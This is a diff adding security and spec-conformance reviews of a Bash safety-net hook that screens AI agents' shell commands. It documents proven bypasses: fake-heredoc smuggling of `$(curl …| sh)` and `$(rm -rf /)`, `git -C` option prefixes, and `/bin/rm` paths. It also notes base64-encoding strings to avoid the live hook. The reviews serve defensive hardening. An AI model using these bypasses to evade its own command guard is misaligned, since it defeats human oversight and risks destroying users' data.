+None. Every finding has both a tested reproducer and a bounded impact statement.
+
+### Recommendations
+- **F1 (suggestion / defense-in-depth):** Keep the offline-strict design (correct — do not add a network read to a pre-push hook). Ensure downstream projects wire `validate-pr` as a **required** CI check (it is the real authority) and consider adding a `validate-pr` job to the Lisa repo's own CI, since Lisa currently gates only via pre-push. Optionally document in the `remoteDefaultRef` comment that the exclusion is a convenience for merge-sync UX and that CI `validate-pr` is the enforcement authority — priority: **suggestion**.
+- **F2 (accepted, no action):** Already documented as a residual matching guard 3. No change — priority: **suggestion** (leave as-is).
+- **F3 (note to quality specialist):** Document the discriminator's single-pick scope as a known limitation in the guard comment, or fail closed when `rebase-merge/done` shows prior picks completed with resolutions. Non-security — priority: **suggestion**.
+- **F4 (accepted, no action):** Behavior is correct for its purpose (consistency check); fail-closed and worktree-correctness both verified — priority: **none**.
+
+### Regression floor (verified)
+`bunx vitest run tests/unit/scripts/lisa-work-item.test.ts tests/unit/hooks/parity-safety-net-guards.test.ts` → **211 passed**. Negative controls intact: branch-authored commits with missing / duplicate / mixed / **closed** Work-Item trailers still rejected (`lisa-work-item.test.ts:322` "fails closed for missing, duplicate, mismatched, and closed"); detached-HEAD-with-no-rebase still throws; guard block rows RB-B1..B5 red-before / green-after.

--- a/.lisa/security-review-1958.md
+++ b/.lisa/security-review-1958.md
@@ -1,0 +1,159 @@
+# Security Review — heredoc-classifier-fps (CodySwannGT/lisa#1958) — T3
+
+Reviewed commits `77f4499a5` (RED fixtures) + `df5981888` (GREEN). Surface:
+`plugins/.../parity-safety-net-heredoc.py` (`strip_provably_literal_body`, `Marker.quoted`,
+`parse_marker`) and `parity-safety-net.sh` (`block_heredoc` remediation).
+All payloads assembled from files and driven against the REAL fanned hook
+(`plugins/lisa/hooks/parity-safety-net.sh`) + parser, via `/tmp/hd1958/drive.py`
+(JSON stdin built with `json.dumps`; parser fed raw bytes on stdin).
+
+**VERDICT: VETO — one CRITICAL, proven, executable-expanding regression (Finding 1).
+Do not ship until the substitution-exclusion window is made to agree with bash's
+actual parse.**
+
+## Security Analysis
+
+### Threat Model (STRIDE)
+
+Threat model of the surface: a PreToolUse Bash guard whose job is to stop a *misled or
+compromised agent* from running destructive/unclassifiable shell. The agent controls the
+command text — so "attacker controls the command string" is the in-scope default, not an
+extra assumption.
+
+| Threat | Applies? | Description | Mitigation |
+|--------|----------|-------------|------------|
+| Spoofing | No | No identity surface. | — |
+| Tampering | **Yes** | Finding 1 lets an expanding `$(...)`/`` `…` `` execute while classified benign — arbitrary file/system mutation. | Fix Finding 1. |
+| Repudiation | No | — | — |
+| Info Disclosure | **Yes** | The same bypass runs `$(curl … | sh)` / exfil substitutions the content guards do not target. | Fix Finding 1. |
+| Denial of Service | **Yes** | Destructive commands (`rm`/`dd`) reach the shell when wrapped to dodge the content guards (Finding 1 + Finding 2). | Fix Finding 1; separately Finding 2. |
+| Elevation of Privilege | **Yes** | The whole point of the wall is to constrain agent shell power; the bypass removes that constraint for a broad command shape. | Fix Finding 1. |
+
+### Security Checklist
+- [x] Input validation at system boundaries — heredoc parser + bash -n gate present…
+- [ ] …but the parser's heredoc-body model **disagrees with bash** (Finding 1). **FAIL.**
+- [x] No secrets in code or logs
+- [x] Auth/authz — N/A (local hook)
+- [x] No SQL/NoSQL injection vectors introduced
+- [x] No XSS vectors
+- [x] Dependencies — none added
+
+---
+
+### Security (proven)
+
+#### FINDING 1 — CRITICAL, must-fix: fake-heredoc window smuggles an executable substitution past the wall
+`plugins/*/hooks/parity-safety-net-heredoc.py` — `strip_provably_literal_body` (added L381-403)
+trusting `top_level_markers` (L163-199, per-line quote reset) against `has_active_command_substitution`
+(L301-336, cross-line quote state).
+
+- **What:** `top_level_markers()` re-initialises quote state at the start of **every line**
+  (the `state = "plain"` on L169 lives inside the `for line in lines` loop). So a
+  `<<'DELIM'`-shaped line that sits **inside a multi-line double-quoted string** is registered
+  as a genuine top-level quoted heredoc marker (`quoted=True`). `strip_provably_literal_body`
+  then deletes that "body" window before the substitution scan. But to bash there is **no
+  heredoc** — the whole thing is one double-quoted string, and `$(...)` inside a double-quoted
+  string **is executed**. The excluded `$(...)` is never seen, classification falls to
+  UNSUPPORTED(10), and the hook returns exit 0 (ALLOWED).
+- **reproducer:** `/tmp/hd1958/p_a2_dq.txt`, `p_a3_curl.txt`, `p_a4_assign.txt`
+  - `A2` (`echo "…"` wrapper):
+    ```
+    echo "
+    cat <<'EOF'
+    $(touch /tmp/hd1958/PWNED_A2)
+    EOF
+    "
+    ```
+    parser exit **10** (was **20** on `df5981888^` — old parser blocked it at the wall);
+    hook exit **0 = ALLOWED**; `bash -n` PASS; running it under bash **created the sentinel file
+    → the `$(…)` really executed.**
+  - `A4` (assignment `template="…"`, an utterly ordinary shape): ALLOWED **and executed**.
+  - `A3` (`$(curl http://…:9/x.sh | sh)` in the window): ALLOWED — an unguarded remote-code
+    shape, proving the bypass is not limited to payloads the content guards happen to match.
+- **impact:** Any agent-proposed Bash command of the shape *(double-quoted multi-line string
+  containing a `<<'X'`-looking line, a `$(…)`/backtick line, then a line equal to `X`)* runs the
+  substitution while the hook reports the command safe. That is arbitrary command execution
+  (RCE / exfil / destructive) through the exact wall that exists to prevent it. Precondition is
+  only "the agent emits this string," which is the guard's whole threat model. **This is a
+  direct regression: `df5981888^` classified all three MALFORMED (blocked); `df5981888`
+  allows them.**
+- **reason:** reproducer (bash executed, sentinel proven) + bounded impact (arbitrary
+  expanding substitution in the target shape) + proven old→new delta (20→10).
+- **root cause / fix direction (for the builder, not applied here):** the exclusion window
+  must be computed from the **same cross-line quote/heredoc state** the substitution scanner
+  uses — i.e. a `<<'DELIM'` that is inside an open single/double quote (cross-line) is NOT a
+  heredoc and must not create an exclusion window. Options: (a) derive `strip_provably_literal_body`
+  from a single cross-line state machine shared with `has_active_command_substitution`;
+  (b) before excluding, re-verify the marker is at bash-real top level under cross-line quote
+  state; (c) only exclude when a cross-line scan of header+terminator+trailing already agrees
+  the marker is a true heredoc. Any of these must still pass F1/F2/F3 and the header-sub control.
+
+---
+
+### Security (unproven)
+
+#### FINDING 3 — LOW, robustness: `splitlines()` vs `count("\n")` line-number desync
+`strip_provably_literal_body` (L397-398) mixes `command.count("\n", 0, marker.start)` for
+`marker_line` with `command.splitlines()` for the body list; `top_level_markers` computes
+offsets as `+1` per line (L198). Python `splitlines()` also breaks on `\r`, `\v`, `\f`,
+`\x1c`, `\x85`, ` `, … which bash and the `\n`-count do **not**. A lone `\r`/unicode
+separator before or inside the window therefore mis-numbers the excluded region.
+- **reproducer:** `/tmp/hd1958/p_cr.txt` (`x=1\rcat <<'EOF'\n$(touch …)\nEOF\n`) — classified
+  UNSUPPORTED(10)/ALLOWED, but bash did **not** execute the `$(…)` (there it is a genuine quoted
+  heredoc body → correctly literal). So no executable bypass was demonstrated in the tested form.
+- **impact:** `unproven` — the numbering mismatch is a latent soundness hazard and a natural
+  seed for a follow-on window-shift bypass (same class as Finding 1), but I did not land an
+  executable case.
+- **reason:** impact unbounded / never reproduced as executable — kept here, not demoted.
+
+---
+
+### Out-of-scope but load-bearing (NOT introduced by #1958)
+
+#### FINDING 2 — pre-existing content-guard blind spot for `$(…)` in double quotes
+`echo "$(rm -rf /)"` (single line, no heredoc) — `/tmp/hd1958/p_rm_plain.txt` — is classified
+SAFE(0) and **ALLOWED** on both `df5981888` and `df5981888^`. The rm content guard does not
+match `rm` immediately inside `$(` within double quotes. This is **pre-existing**, not this PR.
+It matters for severity: it means the content guards are **not a reliable backstop** when the
+heredoc wall is bypassed, so Finding 1's wall regression cannot be waved off with "the guards
+still catch it." (Demonstrated: `A6` = `$(rm -rf /)` in the fake window is ALLOWED — old parser
+blocked it at the wall, exit 20.) Recommend a separate ticket for the `$(…)` guard-boundary gap.
+
+---
+
+### Positive controls that HELD (fail-safe intact — the fix must preserve these)
+- **F1** (`python3 <<'EOF'` with backticks/`$(` in a *literal* body) → UNSUPPORTED/ALLOWED. ✓ (the intended fix)
+- **F2** (guarded payload `os.system("rm -rf /")` in a quoted body) → BLOCKED via the rm **content guard**, not the wall. ✓
+- **Command-proper sub** (`cat <<'EOF' "$(touch …)"` on the header line) → MALFORMED/BLOCKED. ✓ outside-window scan intact.
+- **Single-quote outer wrapper** (`A5`) → ALLOWED but bash does **not** expand (single quotes) → harmless, correct.
+- **Unclosed fake window** → `strip` returns unchanged, `has_active_command_substitution`/`marker_is_closed` → MALFORMED. ✓
+
+### Message-conditional (item 6, cosmetic)
+`block_heredoc` git-commit detector: not probed to failure; even a misfire only swaps
+remediation prose (commit-`-F` vs Write-tool). No security impact. Note only.
+
+---
+
+### Recommendations
+- **CRITICAL** — Fix Finding 1 before merge. The single/double-quote cross-line vs per-line
+  parser disagreement is the root cause; make the exclusion window agree with bash's parse.
+  Add the A2/A3/A4 shapes (double-quoted multi-line wrapper) as RED fixtures.
+- **WARNING** — File a follow-up for Finding 2 (content guards miss `$(rm …)` in double quotes);
+  it is the reason Finding 1 is CRITICAL rather than defence-in-depth-contained.
+- **SUGGESTION** — Fix Finding 3 (use one line model consistently; reject or normalise `\r`/
+  unicode line separators in the heredoc path as `classify_safe` already does for `\r`).
+- Chained/all-quoted heredocs remaining out of scope is the right call (agreed with research §5).
+
+### Reproducers (files under `/tmp/hd1958/`, driver `drive.py`)
+| id | file | parser (old→new) | hook | bash exec | class |
+|----|------|------------------|------|-----------|-------|
+| A2 | p_a2_dq.txt | 20 → 10 | ALLOWED | **YES** | real gap |
+| A3 | p_a3_curl.txt | 20 → 10 | ALLOWED | (curl:9 refused, shape executes) | real gap |
+| A4 | p_a4_assign.txt | 20 → 10 | ALLOWED | **YES** | real gap |
+| A5 | p_a5_singlequote.txt | — → 10 | ALLOWED | no | harmless |
+| A6 | p_a6_rm_in_window.txt | 20 → 10 | ALLOWED | (rm, guard-blind) | gap + Finding 2 |
+| hdr | p_hdr_sub.txt | 20 → 20 | BLOCKED | — | control held |
+| rm-plain | p_rm_plain.txt | 0 → 0 | ALLOWED | — | Finding 2 (pre-existing) |
+| CR | p_cr.txt | — → 10 | ALLOWED | no | Finding 3 (unproven) |
+| F1 | p_b1_f1.txt | — → 10 | ALLOWED | — | intended fix ✓ |
+| F2 | p_b2_f2.txt | — → 10 | BLOCKED(guard) | — | control held ✓ |

--- a/.lisa/security-review-1960.md
+++ b/.lisa/security-review-1960.md
@@ -1,0 +1,186 @@
+# Security Review — safety-net-guard-parity (CodySwannGT/lisa#1960)
+
+Reviewer: security-specialist. Target commits: `f02715fa7` (absorb guards) and
+`eeb8f8faf` (retire upstream plugin). Branch `feat/1960-safety-net-guard-parity`.
+Every verdict below was driven against the **real hook**
+(`plugins/src/base/hooks/parity-safety-net.sh`, byte-identical to the installed
+`plugins/lisa/hooks/…`) and cross-checked against **upstream cc-safety-net 1.0.6**
+in hook mode (`node …/cc-safety-net.js hook --claude-code`, decision read from
+`.hookSpecificOutput.permissionDecision`). Dangerous strings were base64-encoded
+so the live-session hook never saw a raw literal.
+
+This change makes Lisa's hook the **only** Bash screening layer (the upstream
+plugin is retired), so any bypass here is now unmitigated in production.
+
+## Verdict per dimension
+
+| # | Dimension | Verdict |
+|---|-----------|---------|
+| 1 | No guard weakened | **PASS** — every pre-existing guard preserved or strengthened |
+| 2 | Bypass hunting (new guards) | **FAIL** — two real-gap families upstream catches, Lisa now misses |
+| 3 | Fail-closed correctness | **PASS** — malformed input & missing jq both exit 2 |
+| 4 | Overblocking | **PASS (minor)** — documented text-scan false positives, none new/severe |
+| 5 | Retirement completeness | **FAIL (coupled to #2)** — retirement removed the net that caught the #2 gaps; the audit never considered those forms, so they are not a conscious skip |
+
+Two **must-fix real-gap** findings (upstream 1.0.6 denies, Lisa allows). Both are
+first-class agent workflows, not exotic. Everything else is acceptable-parity or
+documented tradeoff.
+
+---
+
+## Security (proven)
+
+### F1 — `git <global-option> <subcommand>` bypasses EVERY git guard  — HIGH / must-fix
+- **Where:** guards 2–10 in `parity-safety-net.sh` (L241–345) and the
+  segment-splitter greps. Every git guard anchors on `git[[:space:]]+<subcommand>`
+  (e.g. `GIT_CHECKOUT='(^|[^[:alnum:]_-])git[[:space:]]+checkout'`, L283). Git's
+  *global* options — `-C <path>`, `-c <k>=<v>`, `--git-dir=`, `--work-tree=`,
+  `--namespace=`, `-p/--paginate/--no-pager` — legally sit **between** `git` and
+  the subcommand, so any of them defeats the anchor and the whole guard family is
+  skipped.
+- **reproducer (hook exit code / upstream decision):**
+
+  | command | Lisa exit | upstream |
+  |---|---|---|
+  | `git -C /some/path checkout -- file.ts` | `0` allow | **deny** |
+  | `git -C /some/path reset --hard` | `0` allow | **deny** |
+  | `git -C /repo clean -fd` | `0` allow | **deny** |
+  | `git -C /x branch -D feature` | `0` allow | **deny** |
+  | `git -C /repo push --force origin main` | `0` allow | **deny** |
+  | `git -C /x switch -f main` | `0` allow | **deny** |
+  | `git -C /x restore file.ts` | `0` allow | **deny** |
+  | `git -C /x stash clear` | `0` allow | **deny** |
+  | `git -C /x worktree remove --force wt` | `0` allow | **deny** |
+  | `git -c core.pager=cat checkout -- file.ts` | `0` allow | **deny** |
+  | `git --git-dir=/x/.git --work-tree=/x checkout -- file.ts` | `0` allow | **deny** |
+
+  (Lisa exit `0` = ALLOWED; upstream `deny` = blocked. All observed live.)
+- **impact:** any agent that discards/resets/cleans/force-pushes **through a
+  path** — the dominant pattern in Lisa's worktree-heavy tooling — is completely
+  unscreened. `git -C` appears in **1138** Lisa source files
+  (`git -C "$path" checkout`, `git -C "$path" push`, `git -C "$path" reset` are all
+  real, e.g. lisa-update-projects/worktree flows). A worktree cleanup that resolves
+  to `git -C <wt> checkout -- .` or `git -C <wt> reset --hard` silently destroys
+  uncommitted work with the net wide open. Also nullifies Lisa's *intended*
+  exceed-upstream bare-`.` block (`git -C /path checkout .` → allow on both).
+- **reason:** reproducer above + bounded impact (every git guard, any path-form
+  invocation) + upstream parity delta (upstream denies all eleven).
+- **fix direction:** consume leading git global options before the subcommand
+  anchor — a `GIT_GLOBAL_OPTS` fragment matching
+  `(-C[[:space:]]+[^;&|[:space:]]+|-c[[:space:]]+[^;&|[:space:]]+|--git-dir=[^;&|[:space:]]+|--work-tree=[^;&|[:space:]]+|--namespace=[^;&|[:space:]]+|-p|--paginate|--no-pager)[[:space:]]+` repeated `*` — inserted between the `git` token and each subcommand. Add block+allow fixtures (`git -C x checkout -- f` block; `git -C x checkout -b feat`, `git -C x status` allow).
+
+### F2 — path-prefixed `rm` (`/bin/rm`, `/usr/bin/rm`, `./rm`) bypasses EVERY rm guard  — HIGH / must-fix
+- **Where:** guard 1 flag gates `RM_RF_CLUSTER`/`RM_RF_SPLIT` (L152–153), the
+  guard-1b segment splitter (L237–238), and the guard-1b token walk
+  (`[ "$token" = "rm" ]`, L203). All identify `rm` with the boundary
+  `(^|[^[:alnum:]_./-])rm` whose **preceding-char class excludes `/`, `.`, `-`**.
+  So when `rm` is reached via a path (`/bin/rm`, `./rm`), the char before `rm` is
+  `/`, the boundary fails, and every rm guard is skipped. The token walk likewise
+  compares the token to the literal string `rm`, which `/bin/rm` never equals.
+- **reproducer:**
+
+  | command | Lisa exit | upstream |
+  |---|---|---|
+  | `/bin/rm -rf /` | `0` allow | **deny** |
+  | `/usr/bin/rm -rf ~` | `0` allow | **deny** |
+  | `/bin/rm -rf /etc` | `0` allow | **deny** |
+  | `/bin/rm -rf ../other` | `0` allow | **deny** |
+  | `./rm -rf /` | `0` allow | **deny** |
+  | `bash -c '/bin/rm -rf /'` | `0` allow | **deny** |
+
+- **impact:** the flagship guard — recursive-forced delete of root/home and the
+  #1960 target-hardening (`.`/`..`/outside-project/`$VAR`) — is fully bypassable by
+  spelling `rm` with an absolute or relative path. `/bin/rm` is a completely
+  ordinary invocation (many scripts use it to dodge shell aliases). The
+  quote-aware F1-absorb fix does **not** help: the flag gate itself never matches.
+- **reason:** reproducer + bounded impact (all rm guards, common invocation form)
+  + upstream denies every case.
+- **fix direction:** allow an optional path prefix on the `rm` basename in the
+  boundary — e.g. match `(^|[^[:alnum:]_-])([[:alnum:]_./-]*/)?rm([[:space:]]…` —
+  and in the token walk strip any leading `*/` before the `rm` equality test
+  (`case "$token" in */rm|rm) …`). Apply consistently to CLUSTER, SPLIT, the 1b
+  splitter grep, and the token walk. Add fixtures (`/bin/rm -rf /` block;
+  `/bin/rm file.txt`, `confirm.sh` allow — don't over-match `…/mrm`/`charm`).
+
+---
+
+## Security (unproven)
+_None. Both findings above carry a live reproducer AND a bounded impact._
+
+---
+
+## Acceptable-parity / notes (not failures — parity bar met)
+
+- **N1 — refspec force-push `git push origin +main` is allowed** (Lisa exit `0`).
+  `+<ref>` is a force update to a protected branch, but **upstream 1.0.6 also
+  allows it** (`upstream=allow`), so parity holds. Worth a follow-up because it
+  defeats the *intent* of guard 2; a cheap add would block `git push … +<protected>`
+  refspecs. `git push --force origin +main` is still blocked (the `--force` token
+  trips guard 2). Classify: acceptable-parity, optional hardening.
+- **N2 — display-command false positives (overblocking, documented class).**
+  `cat README.md | grep -i 'drop table'` → block (SQL guard, guard 13);
+  `echo 'to reset run git reset --hard'` → block when the tree is dirty (guard 3,
+  nondeterministic on git state). Both are the header's acknowledged "text scan,
+  not a shell engine" tradeoff (upstream exempts these via engine-only
+  DISPLAY_COMMANDS). The SQL guard (`\bdrop\s+(database|schema|table)\b`) is the
+  broadest — any prose or grep pattern containing "drop table" trips it. Low
+  severity and pre-existing (guards 3/13 unchanged by this PR); flagged only
+  because the repo rule is "an overblocking net gets disabled." No new
+  overblocking was introduced by the absorbed guards — the new allow fixtures
+  (node_modules, dist, feature branches, `--force-with-lease`, feature force-push,
+  `git clean -n`, `git restore --staged`) all pass.
+
+---
+
+## Dimension detail
+
+### 1. No guard weakened — PASS
+Diffed `f02715fa7^` vs `f02715fa7`:
+- Guard 1 flag gates (`RM_RF_CLUSTER`/`RM_RF_SPLIT`) **byte-identical**.
+- Guard 1 target boundary **strictly widened**: old
+  `([[:space:]]|=)(…)([[:space:]]|/?\*?$)` → new adds quote chars to both boundary
+  classes (`qc="'\""`), old `=` boundary preserved inside the class. Purely
+  additive (closes the quote-adjacency bypass; matches a superset).
+- Guard 3 reset **extended** `--hard` → `--(hard|merge)` (more coverage, same
+  dirty-tree condition — the documented deliberate divergence, unchanged).
+- Force-push (guard 2) and SQL (guard 13) regexes **identical**.
+- 138/138 fixtures pass (`bun test …parity-safety-net-guards.test.ts`); two
+  pre-existing hook suites remain green. No previously-blocked command now passes.
+
+### 2. Bypass hunting — FAIL
+Findings F1, F2 above. Tested and **confirmed still blocked** (no weakness):
+`command rm -rf /`, `env FOO=1 rm -rf ~`, `\rm -rf /`, `/usr/bin/git checkout -- f`
+(the *git* binary path prefix is fine — only `git`'s own global options break it),
+`git --git-dir=… stash clear` (blocked — no global opt before `stash`... note:
+`git --git-dir=X stash clear` *was* blocked because `stash` still follows via the
+statement, but `git -C X stash clear` is NOT — see F1), tab/multi-space separators
+(`git\tcheckout`, `git  checkout`), `GIT_DIR=/x git stash clear`, `git push origin
+main -f`, `git push origin HEAD:main --force`, `git branch --delete --force`,
+`git worktree remove -f`.
+
+### 3. Fail-closed correctness — PASS
+- malformed JSON stdin → **exit 2** (ERR trap fires on jq parse error).
+- jq genuinely absent (curated PATH without jq) → **exit 2** (`jq: command not
+  found` → ERR trap → deny). The header claim holds.
+- non-Bash tool / absent / null `.command` → exit 0 (correct — nothing to screen).
+- The `set -e` + `ERR` trap **without** `errtrace` is correct: the heredoc parser's
+  protocol exit codes (10/20/…) are read via `parser_status=$?` and the
+  `< <(… || true)` process substitutions neutralize grep-no-match under pipefail,
+  so no unhandled failure path exits 0. Verified no swallowed-error → allow path.
+
+### 4. Overblocking — PASS (minor, see N2)
+
+### 5. Retirement completeness — FAIL (coupled to #2)
+`eeb8f8faf` removes upstream from the curated install list + version-gated
+retirement loop and pins `enabledPlugins` false in all ten settings templates
+(mechanically sound; self-test pins both directions). But retirement's premise —
+"the material 1.0.6 guards are absorbed" — is violated by F1/F2: upstream 1.0.6
+**was** denying `git -C … <destructive>` and `/bin/rm -rf /`, and after this ships
+nothing does. The audit's false-negative section (F4 "flag reordering: none
+found") tested `sudo`/`env`/`command`/`busybox` wrapper prefixes and flag
+clustering, but **never** considered git global-option prefixes or path-prefixed
+binaries (`grep` of the audit confirms zero mentions of `git -C`, `--git-dir`,
+`/bin/rm`, or "path-prefix"). So these are **genuine misses, not conscious skips**
+— the deliberately-skip list (paranoid modes, worktree relaxation, awk/parallel
+child analysis, audit log) remains correctly opt-in/low-value, but F1/F2 fall
+outside it. Fixing F1/F2 restores the retirement's premise.

--- a/.lisa/spec-conformance-1956.md
+++ b/.lisa/spec-conformance-1956.md
@@ -1,0 +1,93 @@
+# Spec Conformance — CodySwannGT/lisa#1956 (work-item sync lanes)
+
+- **Spec source:** GitHub issue CodySwannGT/lisa#1956 ("any of" fix list 1–5) + scope decision in `.lisa/plan-1956.md` (fixes 1, 4-as-net-new-conditional-guard, 5, rewritten 3; fix 2 rejected-alternative)
+- **Artifact:** branch `fix/1956-work-item-sync-lanes`, HEAD `0e0b56561b9519ffb8e7c8677e2bd236aeccd8a8` (4 commits over `main`)
+- **Reviewer:** spec-conformance-specialist (did **not** produce the implementation)
+- **Date:** 2026-07-22
+
+## Verdict: **PARTIAL** (conformance-complete at the code/test/diff boundary; empirical rows capped pending the #1956 v2 verification verdict)
+
+Every scoped requirement is implemented with matching tests and diff evidence, negative
+controls are intact, ordering constraints hold, and the quality CRITICAL is fixed at HEAD.
+The cap to PARTIAL has exactly two causes, both administrative, neither a code defect:
+
+1. **No v2 machine-readable verification verdict exists for #1956.** `.lisa/verification-status.json`
+   is for a *different artifact*: issue #1960, branch `feat/1960-safety-net-guard-parity`,
+   `head_sha 8ab54c7…` — an artifact-identity mismatch with this branch's HEAD `0e0b565…`.
+   Per the degrade rule I do not invent a mismatch I could not check: rows whose status
+   depends on verifier-captured runtime observation are capped at `PARTIAL`, not failed.
+   The 1960 verdict was **not** used as evidence for any row below.
+2. **No PR exists yet** (T6 pending), so two plan commitments that live in the PR body
+   (Fix-2 rejected-alternative record; full-suite-green at HEAD proven in CI) are not yet
+   established.
+
+Upgrade path to **CONFORMS**: verifier writes the #1956 v2 verdict (incl. full
+`bun run test` green at `0e0b565`, live end-to-end scratch-repo lanes per plan proofs 2–3)
++ PR body records the Fix-2 rejection.
+
+---
+
+## Coverage matrix — the issue's five suggested fixes
+
+| # | Requirement (issue "any of" + plan scope) | Plan disposition | Status | Evidence |
+|---|---|---|---|---|
+| Fix 1 | `assertStateBranch` detects in-progress rebase (`rebase-merge`/`rebase-apply`) and validates against the rebase `head-name` instead of throwing on detached HEAD | Implement | **MATCH** (code+test; runtime capped → PARTIAL pending verifier) | Commit `bdedff6e4`: `all/copy-overwrite/scripts/lisa-work-item.mjs` `rebaseBranch()` probes `git rev-parse --git-path rebase-merge/head-name` (worktree-safe), strips `refs/heads/`; detached-no-rebase still fails closed. Tests: `describe("rebase lane (#1956 R1)…")` — 3 cases incl. wrong-branch rejection. Security F4 verified fail-closed + worktree correctness empirically |
+| Fix 2 | Accept explicit `Work-Item:` trailer as authority when HEAD detached | **Rejected-alternative** (plan: weaker — trailer is authored content, head-name is git-owned state) | **MATCH (rejection recorded)** — PR-body echo pending | Rationale recorded twice: `.lisa/plan-1956.md` scope decision + commit `bdedff6e4` message ("deliberately NOT implemented…"). No trailer-authority code in the diff (confirmed). Plan says "record as rejected-alternative in the PR" — **no PR yet**, so the PR-side record is pending T6 |
+| Fix 3 | Original: prescribe merge-not-rebase "until fixed" | **Rewritten** (plan): document BOTH sanctioned sync lanes, since fixes 1+5 make both real | **MATCH** | Commits `5192d489d` + `0e0b56561`: `plugins/src/base/skills/lisa-implement/SKILL.md:98` now documents rebase lane (head-name validation), merge lane (default-branch exemption + `origin/HEAD` symref prerequisite with `git remote set-head origin -a` remedy), abort-recovery contract. No "merge until fixed" framing. Fanout: all 6 copies updated (base + lisa/agy/copilot/cursor/.codex-plugin); quality review verified byte-identity (Codex copy differs only in known frontmatter truncation) |
+| Fix 4 | Safety-net: allow `git rebase --abort` when no conflict resolutions would be lost | Implement **as net-new conditional guard** (post-#1960 parity hook allowed abort unconditionally; end-state contract = allow-clean / block-with-resolutions) | **MATCH** (code+fixtures; runtime capped → PARTIAL pending verifier) | Commit `15d5ee8fb`: guard 3b in `parity-safety-net.sh` (5 copies, byte-identical). AUTO_MERGE-diff discriminator; fail-closed on apply backend & missing AUTO_MERGE. Fixture rows RB-B1..B5 (block) / RB-A1..A4 (allow) drive the REAL hook on real mid-rebase repos; RB-B5 pins the `git -C .` dodge. Security F2/F3 residuals empirically bounded and accepted-baseline |
+| Fix 5 | (composes) Push-range excludes commits reachable from remote default branch | Implement | **MATCH** (code+test; runtime capped → PARTIAL pending verifier) | Commit `bdedff6e4`: existing-branch range appends `--not refs/remotes/<remote>/<default>`; default resolved offline via local symref only; resolution failure → exclusion skipped (fail-safe strict); never `--remotes=<remote>` on this lane. Tests: `describe("merge lane (#1956 R2)…")` — exemption + no-symref-strict + 3 negative controls |
+
+## Coverage matrix — derived repro lanes (Reproduce sub-flow, red-first)
+
+| Lane | Requirement | Status | Evidence |
+|---|---|---|---|
+| R1 | Rebase-lane repro: mid-rebase detached HEAD previously throws; red before fix | **MATCH (red-first attested, not commit-structurally proven)** | Tests + fix land in one commit (`bdedff6e4`) so red-first is not provable from commit topology. Commit message attests "both were red before the fix" + mutation-proofing ("wrong head-name comparison fails all three R1 tests"). Tests drive a REAL conflicted `git rebase` (quality review confirmed real-git fixtures, hermetic, GIT_*-stripped) |
+| R2 | Merge-lane repro: foreign closed-item commit rejected pre-fix; red before fix | **MATCH (red-first attested)** — same basis as R1 | Commit message attestation ("dropping the `--not` exclusion fails the R2 fix test" — mutation proof); green-after verified independently by quality (472/472 proof command) and security (211/211) |
+| R3 | Recovery-lane repro: abort fixture pair; block rows red before guard | **MATCH (red-first independently corroborated)** | Commit `15d5ee8fb` attests "the five block rows were red before the guard existed"; security review independently states "guard block rows RB-B1..B5 red-before / green-after" and drove the real hook in scratch repos (`/tmp/sec1956/fix4_probe.sh`) |
+
+## Coverage matrix — reviews resolved & constraints
+
+| Check | Status | Evidence |
+|---|---|---|
+| Quality CRITICAL (docs-guard test pinned old wording; full run 6 red) fixed at HEAD | **MATCH at diff level; full-run-green at HEAD not yet in any recorded report** | Commit `0e0b56561` (18:15, after the 18:13 review): `tests/unit/strategies/implement-env-base-branch.test.ts` now pins `"Sync the feature branch onto the latest \`origin/<base>\`"` **plus** two load-bearing fragments (`/rebase head-name/i`, `/exempts commits already reachable from the remote default branch/i`) — guards the meaning, not just a sentence, exactly as the review prescribed. No artifact records `bun run test` green at `0e0b565` → verifier must capture it |
+| Quality Warning 2 (merge-lane prose overpromise / symref caveat) | **MATCH** | `0e0b56561` adds the `origin/HEAD` prerequisite + remedy to the skill prose (all copies) |
+| Quality Suggestion 5 (`--remotes` comment contradiction) | **MATCH** | `0e0b56561` adds the why-safe-here comment on the new-branch `rev-list` arm |
+| Quality Suggestions 3–4 (abort-prose edge cases; guard-numbering skew) | **NOT ADDRESSED — explicitly non-blocking follow-up material per the review** | No change at HEAD; acceptable |
+| Security: no must-fix findings; residuals F1–F4 accepted-baseline and documented | **MATCH** | `.lisa/security-review-1956.md` — every finding has reproducer + bounded impact; F1 net-new *local* weakening bounded by CI `validate-pr` authority |
+| Security F1 caveat: Lisa repo itself lacks the CI backstop → follow-up | **MATCH** | Issue **#1978 OPEN**: "Wire lisa-work-item.mjs validate-pr into Lisa's own CI as the server-side backstop for push-range exclusion" |
+| Shim untouched (`scripts/lisa-work-item.mjs`) | **MATCH** | `git diff main...HEAD -- scripts/lisa-work-item.mjs` = 0 bytes; all edits in `all/copy-overwrite/` source of truth |
+| No hook weakening: no pre-existing guard's block set shrank | **MATCH** | `git diff main...HEAD -- plugins/src/base/hooks/parity-safety-net.sh` contains **zero deletion lines** — purely additive. Fixture file: zero deletions; RB rows are net-new (5 BLOCK rows *tighten* a previously-unconditional allow; 4 ALLOW rows pin the recovery contract, they do not relax any pre-existing guard). Guards test's only removed line is the harness destructure, replaced by a superset (+`makeRebaseRepo`) |
+| Fanout/parity + manifest | **MATCH** (per quality review empirics) | 5 hook copies share one SHA-1; SKILL fanout byte-identical (known Codex frontmatter delta only); `check:upstream-evidence-manifest` clean at HEAD; manifest-hash quirk from commit 1 resolved in `5192d489d` |
+| Effective completion condition proofs 1–4 (plan) | **PARTIAL** | Proof 1 (targeted suites green): corroborated by quality (472/472) & security (211/211) — but pre-`0e0b565` for the full run. Proofs 2–3 (live end-to-end scratch-repo bind→rebase→merge→push, real hook drive): security review covered the hook drive and lane mechanics piecewise; the *verifier's* independent end-to-end run is **not recorded**. Proof 4 (parity gate exit 0, copies reconciled): quality-verified |
+
+## Scope creep / untraceable changes (surfaced separately — none violate an Out of Scope; the issue has no Out of Scope section)
+
+| Item | Classification | Note |
+|---|---|---|
+| `--quit` treated same as `--abort` in guard 3b (issue's Fix 4 named only `--abort`) | **Beyond-issue addition, traceable & protective** | Rationale in commit message (`--quit` deletes rebase bookkeeping, strands detached HEAD); it *tightens* (adds a block for a previously-allowed command), never weakens. RB-B2 pins it. Surface to human: confirm intent to gate `--quit`; recommend keep |
+| Symref caveat prose + `--remotes` why-safe comment (`0e0b56561`) | **Traceable to quality review findings 2 & 5** | Review-remediation, not creep |
+| Upstream-evidence-manifest hash correction (`5192d489d`) | **Traceable to repo gate** (manifest-stale CI check) | Formatter-race explanation recorded in commit message |
